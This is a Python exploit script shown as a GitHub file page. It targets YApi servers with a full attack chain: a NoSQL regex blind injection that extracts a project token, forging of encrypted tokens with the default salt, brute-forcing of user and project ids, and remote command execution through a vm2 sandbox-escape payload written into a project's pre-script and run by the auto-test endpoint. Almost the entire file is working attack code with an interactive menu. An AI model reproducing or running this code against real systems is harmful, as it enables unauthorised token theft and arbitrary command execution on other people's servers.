-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexp.py
468 lines (416 loc) · 21.3 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author : wh1sper
# @Time : 2022/12/4 12:33
import argparse, requests, random, json, time
import traceback
from Crypto.Cipher import AES
from hashlib import md5
from urllib.parse import urlparse
class AESCipher(object):
class InvalidBlockSizeError(Exception):
"""Raised for invalid block sizes"""
pass
def __init__(self, key, block_size=16) -> None:
if block_size < 2 or block_size > 255:
raise AESCipher.InvalidBlockSizeError('The block size must be between 2 and 255, inclusive')
self.block_size = block_size
self.key, self.iv = self.EVP_BytesToKey(key.encode("utf-8"), "".encode("utf-8"), 24, 16)
def __pad(self, text) -> str:
text_length = len(text)
amount_to_pad = self.block_size - (text_length % self.block_size)
if amount_to_pad == 0:
amount_to_pad = self.block_size
self.pad = chr(amount_to_pad)
return text + self.pad * amount_to_pad
def __unpad(self, text) -> str:
try: text = text.rstrip(self.pad)
except: pass
return text
def encrypt(self, raw) -> str:
raw = self.__pad(raw).encode()
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
return cipher.encrypt(raw).hex()
def decrypt(self, enc) -> str:
enc = bytes.fromhex(enc)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv )
return self.__unpad(cipher.decrypt(enc).decode("utf-8"))
def EVP_BytesToKey(self, password, salt, key_len, iv_len) -> tuple[bytes, bytes]:
"""
Derive the key and the IV from the given password and salt.
"""
dtot = md5(password + salt).digest()
d = [ dtot ]
while len(dtot)<(iv_len+key_len):
d.append( md5(d[-1] + password + salt).digest() )
dtot += d[-1]
return dtot[:key_len], dtot[key_len:key_len+iv_len]
class Exploit(object):
def __init__(self, target="", proxy=dict(), yapi_salt="abcde", sleep_seconds="0.2", req_timeout="3",
token="", uid="", project_id="", encrypted_token="", command="") -> None:
self.target = target
self.proxy = proxy
self.yapi_salt = yapi_salt
self.sleep_seconds = sleep_seconds
self.req_timeout = req_timeout
self.token = token
self.uid = uid # Author's uid
self.project_id = project_id # id, the project id
self.encrypted_token = encrypted_token # encrypt(uid+'|'+token)
self.aes_handler = AESCipher(self.yapi_salt, 16)
self.command = command
self.api_list = { # 0->allow GET, 1->allow POST
'/api/open/run_auto_test':0,
'/api/open/import_data':1,
'/api/interface/add': 1,
'/api/interface/save': 1,
'/api/interface/up': 1,
'/api/interface/get': 0,
'/api/interface/list': 0,
'/api/interface/list_menu': 0,
'/api/interface/add_cat': 1,
'/api/interface/getCatMenu': 0,
'/api/interface/list_cat': 0,
'/api/project/get': 0,
'/api/plugin/export': 0,
'/api/project/up': 1
}
self.alive_api_allow_get = []
self.alive_api_allow_post = []
def encrypt_token(self) -> str:
if self.uid == "" or self.token == "":
print("[E] uid or token is null.")
return ""
self.encrypted_token = self.aes_handler.encrypt(self.uid + "|" + self.token)
return self.encrypted_token
def decrypt_token(self) -> str:
if self.encrypted_token == "":
print("[E] encrypted_token is null.")
return ""
payload = self.aes_handler.decrypt(self.encrypted_token).split("|")
self.uid = payload[0]
self.token = payload[1]
return self.uid + "|" + self.token
def check_token_validity(self) -> bool:
check_obj = self.encrypted_token if self.encrypted_token != "" else self.token
if check_obj == "":
print("[E] token is null.")
return False
print("[*] checking token {}".format(str(check_obj)))
target, route = self._generate_target("/api/project/up")
data = json.dumps({"id": 1, "token": check_obj})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
if r.status_code != 200:
print("[E] {} can't be accessed.".format(route))
return False
if "请登录" in json.loads(r.text)["errmsg"]:
print("[-] The token is invalid.")
return False
elif "服务器出错" in json.loads(r.text)["errmsg"]:
print("[-] The encryped token's format is right, but the token is invalid.")
return False
elif "没有权限" in json.loads(r.text)["errmsg"]:
print("[+] The token (encrypted/non-encrypted) is valid, but the uid is invalid.")
print(" try to `encrypt(uid+'|'+token)` to get a valid encrypted token.")
return True
else:
print("[+] The encryped token is valid.")
return True
def get_alive_api_list(self) -> tuple[list, list]:
if len(self.alive_api_allow_get) != 0 and len(self.alive_api_allow_post) !=0:
return self.alive_api_allow_get, self.alive_api_allow_post
print("[*] getting api...")
api_allow_get, api_allow_post = [], []
for i in self.api_list:
if self.api_list[i] == 1:
r = requests.post(self.target+i, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
if r.status_code == 200: api_allow_post.append(i)
else:
r = requests.get(self.target+i, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
if r.status_code == 200: api_allow_get.append(i)
time.sleep(float(self.sleep_seconds))
self.alive_api_allow_get = api_allow_get
self.alive_api_allow_post = api_allow_post
return api_allow_get, api_allow_post
def get_token_by_inject(self) -> str:
print("[*] getting token by inject...")
target, route = self._generate_target("/api/project/up")
data = json.dumps({"id":1, "token":{"$regex":".*?"}})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
if r.status_code != 200:
print("[E] {} can't be accessed.".format(route))
return ""
if "请登录" not in json.loads(r.text)["errmsg"]:
payloadlist = "0123456789abcdef"
payload = "^"
for i in range(0, 20):
for j in payloadlist:
data = json.dumps({"id":1, "token":{"$regex":"{}".format(payload+j)}})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
time.sleep(float(self.sleep_seconds))
if "没有权限" in json.loads(r.text)["errmsg"]:
payload += j
print("[+] find payload: {}".format(data))
break
else: # 成功的话系统回显没有权限
continue
self.token = payload.replace("^", "")
return self.token
else:
print("[-] target:{} cannot be injected.".format(target))
return ""
def get_id_uid_by_token(self) -> tuple[str, str]:
if self.encrypted_token != "": self.encrypted_token = "" # reset the encrypted_token
if self.check_token_validity() == False: return "", "" # check the token is valid or not
print("[*] brute-force attacking...")
target, _= self._generate_target("/api/project/up")
# brute force uid
print("[*] getting uid...")
uid_range = 1000
for i in range(1, uid_range):
self.uid = str(i)
self.encrypt_token()
data = json.dumps({"id": 1, "token": self.encrypted_token})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
time.sleep(float(self.sleep_seconds))
if "没有权限" not in json.loads(r.text)["errmsg"]:
print("[+] find uid: {}".format(self.uid))
break
elif i == uid_range:
print("[-] unable to find uid in range(1, {})".format(str(uid_range)))
# brute force project id
print("[*] getting project id...")
project_id_range = 1000
for i in range(1, project_id_range):
data = json.dumps({"id": i, "token": self.encrypted_token})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
time.sleep(float(self.sleep_seconds))
if "成功" in json.loads(r.text)["errmsg"]:
self.project_id = str(i)
print("[+] find id (project id): {}".format(self.project_id))
break
elif i == project_id_range:
print("[-] unable to find id in range(1, {})".format(project_id_range))
return "", ""
return self.project_id, self.uid
def execute_command(self) -> None:
if self.encrypted_token == "":
print("[E] encrypted token is null.")
return ""
if self.project_id == "":
print("[E] project id is null.")
return ""
if self.check_token_validity() == False:
return ""
if self.command == "":
print("[E] command is null.")
return ""
target, _ = self._generate_target("/api/project/up")
data = json.dumps({"id": int(self.project_id),
"token": self.encrypted_token, "pre_script": self._generate_vm2_esc_payload()})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
time.sleep(float(self.sleep_seconds))
if "成功" in json.loads(r.text)["errmsg"]:
print("[+] command writed successfully!")
target1, _ = self._generate_target(path="/api/open/run_auto_test")
params = {"id": int(self.project_id), "token": self.encrypted_token}
r = requests.get(target1, params=params, headers=self._generate_http_header(),
proxies=self.proxy, verify=False) # 执行命令会有延时,所以不需要设置超时时间
if "测试报告" in r.text:
print("[+] command executed successfully!")
elif "id值不存在" in r.text:
print("[-] command executed failed. the server responded 'id值不存在'.")
else:
print("[-] command executed failed.")
data = json.dumps({"id": int(self.project_id), "token": self.encrypted_token, "pre_script": ""})
r = requests.post(target, data=data, headers=self._generate_http_header(),
timeout=float(self.req_timeout), proxies=self.proxy, verify=False)
if "成功" in json.loads(r.text)["errmsg"]:
print("[+] command deleted successfully!")
else:
print("[-] command deleted failed! please delete manually.")
else:
print("[+] command writed failed.")
def show_info(self) -> dict[str: str]:
info = {
"target": self.target,
"proxy": self.proxy,
"yapi_salt": self.yapi_salt,
"sleep_seconds": self.sleep_seconds,
"req_timeout": self.req_timeout,
"token": self.token,
"uid": self.uid,
"project_id": self.project_id,
"encrypted_token": self.encrypted_token,
"command": self.command
}
print("[*] current information:")
for i in info:
print(" {}: {}".format(i, info[i]))
return info
def _get_post_route(self) -> str:
try:
route = random.choice(self.alive_api_allow_post)
except:
_, self.alive_api_allow_post = self.get_alive_api_list()
route = random.choice(self.alive_api_allow_post)
return route
def _generate_target(self, path="") -> str:
if self.target == "":
self.target = "http://127.0.0.1:3000/api/project/up"
print("[E] target is null. set to default: {}".format(self.target))
target_parser = urlparse(self.target)
scheme = target_parser.scheme if target_parser.scheme is not None else "http"
hostname = target_parser.hostname if target_parser.hostname is not None else "127.0.0.1"
port = target_parser.port if target_parser.port is not None else "80"
if path == "":
if len(target_parser.path) > 1: path = target_parser.path
else: path = self._get_post_route()
if path[0] != "/":
path = "/" + path
self.target = scheme + "://" + hostname + ":" + str(port) + path
return self.target, path
def _generate_vm2_esc_payload(self) -> str:
return "constructor.constructor('return process')().mainModule.require('child_process')" +\
".execSync('{}')".format(self.command)
def _generate_http_header(self, content_type="application/json") -> dict[str: str]:
ua_list = [
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5"
]
header = {
"User-Agent": random.choice(ua_list),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Referer": self.target,
"DNT": "1",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Content-Type": content_type
}
return header
def banner() -> None:
print("""
__ _____ _ ______ __ _ __
\ \/ / | ____ (_) / ____/ ______ / /___ (_) /_
\ / /| | / __ \/ / / __/ | |/_/ __ \/ / __ \/ / __/
/ / ___ |/ /_/ / / / /____> </ /_/ / / /_/ / / /_
/_/_/ |_/ .___/_/ /_____/_/|_/ .___/_/\____/_/\__/
/_/ /_/
""")
def menu() -> None:
print("""
#########################################################################################
请选择:
1.show_info \t显示当前信息
2.modify_information \t修改当前信息
3.encrypt_token \t从token和uid加密得到encrypted token
4.decrypt_token \t解密encrypted token, 得到uid和token
5.check_token_validity \t检测当前token是否可用
6.get_alive_api_list \t获取所有支持GET和POST方法的API
7.get_token_by_inject \t通过布尔盲注获得一个(加密之前的)token
8.get_id_uid_by_token \t通过一个(加密之前的)token获得项目id和作者uid
9.execute_command \t执行命令(无回显), 需要项目id和一个(加密过后的)token
0.exit \t退出
#########################################################################################
""")
def main(args=None) -> None:
exp = Exploit()
if args is not None:
exp.target = args.target if args.target is not None else ""
exp.proxy = {"http": args.proxy, "https": args.proxy} if args.proxy is not None else {}
exp.yapi_salt = args.salt if args.salt is not None else "abcde"
exp.sleep_seconds = args.sleep if args.sleep is not None else "0.2"
exp.token = args.token if args.token is not None else ""
exp.uid = args.uid if args.uid is not None else ""
exp.project_id = args.id if args.id is not None else ""
exp.encrypted_token = args.entoken if args.entoken is not None else ""
exp.command = args.cmd if args.cmd is not None else ""
try:
res = getattr(exp, args.action)()
print(res)
except Exception as e:
if "no attribute" in str(e):
print("[E] no such action.")
else:
print(str(e))
# traceback.print_exc() # debug
else:
while True:
try:
menu()
ipt = input().strip().split()
case = ipt[0] if len(ipt) > 0 else "1"
if case == "1": exp.show_info()
elif case == "2":
exp.show_info()
print("[*] 输入要修改的信息, 比如: `target=http://127.0.0.1:3000, proxy=socks5://127.0.0.1:8080`, 使用逗号分隔")
ipt1 = input().strip().split(",")
for i in ipt1:
try:
key, value = i[0:i.index("="):].strip(), i[i.index("=")+1::].strip()
if hasattr(exp, key):
if key == "proxy": value = {"http": value, "https": value}
setattr(exp, key, value)
print("[+] 已设置 {} 为 {}".format(key, value))
else:
print("[-] 没有这个属性: {}".format(key))
except:
print("[*] 输入有误: {}".format(i))
elif case == "3": print(exp.encrypt_token())
elif case == "4": print(exp.decrypt_token())
elif case == "5": print(exp.check_token_validity())
elif case == "6":
res = exp.get_alive_api_list()
print("[+] allow GET:")
for i in res[0]: print(" -", i)
print("[+] allow POST:")
for i in res[1]: print(" -", i)
elif case == "7": print(exp.get_token_by_inject())
elif case == "8": print(exp.get_id_uid_by_token())
elif case == "9": exp.execute_command()
elif case == "0":
print("exit.")
break
else: print("[*] 输入有误")
except Exception as e:
print(str(e))
# traceback.print_exc() # debug
if __name__ == '__main__':
banner()
parser = argparse.ArgumentParser(prog="python3 exp.py", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-shell", help="交互式操作, 如果使用这个参数则无需输入其他任何参数", action="store_true")
parser.add_argument("-target", help="目标站点, 比如: http://127.0.0.1:3000/")
parser.add_argument("-proxy", help="HTTP代理, 比如: http://127.0.0.1:8080/, 默认为空")
parser.add_argument("-action", help="要执行操作, 有如下几个操作:\n \
encrypt_token \t从token和uid加密得到encrypted token\n \
decrypt_token \t解密encrypted token, 得到uid和token\n \
check_token_validity \t检测当前token是否可用\n \
get_alive_api_list \t获取所有支持GET和POST方法的API\n \
get_token_by_inject \t通过布尔盲注获得一个(加密之前的)token\n \
get_id_uid_by_token \t通过一个(加密之前的)token获得项目id和作者uid\n \
execute_command \t通过pre_script执行命令, 需要项目id和一个(加密过后的)token\n", )
parser.add_argument("-salt", help="YApi用于加密uid和token的盐, 默认为'abcde'")
parser.add_argument("-sleep", help="每个请求的间隔的秒数, 默认为0.2")
parser.add_argument("-timeout", help="请求超时时间, 默认为3")
parser.add_argument("-token", help="加密之前的token, 如果你有的话")
parser.add_argument("-uid", help="项目作者的uid, 如果你有的话")
parser.add_argument("-id", help="项目id, 如果你有的话")
parser.add_argument("-entoken", help="加密之后的token, 如果你有的话")
parser.add_argument("-cmd", help="要执行的命令, 无回显")
args = parser.parse_args()
if args.shell:
main()
else:
main(args)